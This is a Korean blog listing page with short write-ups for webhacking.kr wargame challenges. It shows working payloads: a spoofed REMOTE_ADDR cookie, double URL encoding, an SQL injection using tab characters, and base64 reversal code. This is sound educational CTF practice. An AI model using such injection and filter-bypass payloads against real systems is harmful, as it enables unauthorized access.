[Webhacking.kr] old-24
Wargame/webhacking.kr
https://webhacking.kr/challenge/bonus-4/ extract($_SERVER)와 extract($_COOKIE)를 연달아 실행하는데, 만약 REMOTE_ADDR이라는 이름의 쿠키가 있으면 $_COOKIE['REMOTE_ADDR']이 $_SERVER['REMOTE_ADDR']을 덮어쓰게 되어, 이 값이 $ip로 들어간다. str_replace()를 거친 결과가 127.0.0.1이 되는 값을 넣어주면 된다. 112277...00...00...1 → 112277..00..00..1 → 1277..00..00..1 → 127.00..00..1 → 127.0.0.1
[Webhacking.kr] old-26
Wargame/webhacking.kr
https://webhacking.kr/challenge/web-11/ id를 URL decoding한 결과가 admin이어야 한다. URL에서 서버로 전달될 때 한 번, 코드에서 한 번 디코딩되기 때문에 admin을 두 번 URL encoding해서 넣어주면 된다. https://webhacking.kr/challenge/web-11/?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65로 접속하면 문제가 풀린다.
[Webhacking.kr] old-18
Wargame/webhacking.kr
https://webhacking.kr/challenge/web-32/ 필터링을 피해서 no에 2%09or%09id='admin'을 넣으면 전체 쿼리는 아래와 같다. select id from chall18 where id='guest' and no=2\tor\tid='admin' https://webhacking.kr/challenge/web-32/index.php?no=2%09or%09id=%27admin%27로 접속하면 문제가 풀린다.
[Webhacking.kr] old-16
Wargame/webhacking.kr
https://webhacking.kr/challenge/js-3/ Challenge 16 * 아스키 코드 124인 문자(|)를 입력하면 |.php로 리다이렉트되면서 문제가 풀릴 것 같다.
[Webhacking.kr] old-06
Wargame/webhacking.kr
https://webhacking.kr/challenge/web-06/ 디코딩을 거친 $decode_id가 admin이고 $decode_pw가 nimda이면 플래그를 준다. 디코딩 과정을 거꾸로 따라가면 user와 password에 넣어야 하는 값을 구할 수 있다. import base64 decode_id = b'admin' decode_pw = b'nimda' for i in range(20): decode_id = base64.b64encode(decode_id) decode_pw = base64.b64encode(decode_pw) decode_id = decode_id.replace(b"1", b"!") decode_id = decode_id.replace(b"2", b"@") decode_id..
h0meb0dy_
'분류 전체보기' 카테고리의 글 목록 (60 Page)